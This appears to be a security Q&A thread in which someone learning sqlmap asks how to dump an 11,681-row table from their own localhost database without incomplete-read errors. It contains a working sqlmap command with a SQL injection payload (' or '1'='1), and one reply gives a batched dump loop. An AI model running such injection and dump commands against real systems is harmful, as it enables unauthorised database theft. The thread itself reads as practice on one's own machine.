
I am learning sqlmap and was trying to dump a large table (about 11K entries) on my localhost.

The command I used is:

python sqlmap.py -u "http://localhost/searchre.php" --data="search=' or '1'='1" 
--delay=10 --timeout=100 --random-agent --dump -D Animal -T types --keep-alive --threads=5

It is supposed to dump the types table from the Animal database.

[12:29:36] [INFO] the SQL query used returns 11681 entries

[12:29:36] [INFO] starting 5 threads

[12:29:48] [CRITICAL] there was an incomplete read error while retrieving data 
from the target URL or proxy. sqlmap is going to retry the request(s)

[12:29:48] [WARNING] if the problem persists please try to lower the number of 
used threads (option '--threads')

I tried lowering the number of threads, but to no avail. What should I do when the table is this large?
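One workaround worth trying (a sketch, not tested against your target): instead of pulling all 11681 rows in one long-running dump, split the dump into batches using sqlmap's `--start` and `--stop` options (first/last table entry to retrieve). That way an "incomplete read" only costs you one batch, and sqlmap's session file lets a re-run resume where it left off. The URL, database, and table names below are taken from the question; the batch size of 2000 is an arbitrary choice.

```shell
# Hypothetical chunked dump: split the 11681-row table into batches of 2000
# rows via sqlmap's --start/--stop options. "echo" only prints the commands
# for review; remove it to actually run them. --threads=1 keeps the load low.
total=11681
step=2000
start=1
while [ "$start" -le "$total" ]; do
  stop=$(( start + step - 1 ))
  [ "$stop" -gt "$total" ] && stop=$total
  echo python sqlmap.py -u "http://localhost/searchre.php" \
    --data="search=' or '1'='1" --random-agent --keep-alive --threads=1 \
    --dump -D Animal -T types --start="$start" --stop="$stop"
  start=$(( stop + 1 ))
done
```

If a batch still fails, you can shrink `step` further, or re-add `--delay` between requests for the problematic range only.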

  • This is a stab in the dark, but have you tried 127.0.0.1 instead? Have you set up local domains?
    – chriz
    Commented May 9, 2016 at 13:45
  • "incomplete read" would appear to mean that the connection was closed before all the threads had completed. Have you lowered the threads to 1?
    – schroeder
    Commented May 9, 2016 at 15:26
  • @chriz yes i did
    – Johnny
    Commented May 10, 2016 at 4:44
  • @schroeder I tried the lowest level, i.e. 1 :) and even tried adding a delay between requests with --delay
    – Johnny
    Commented May 10, 2016 at 4:58
  • @Johnny Have you been able to solve your problem yet?
    – Learner
    Commented Sep 28, 2022 at 6:24
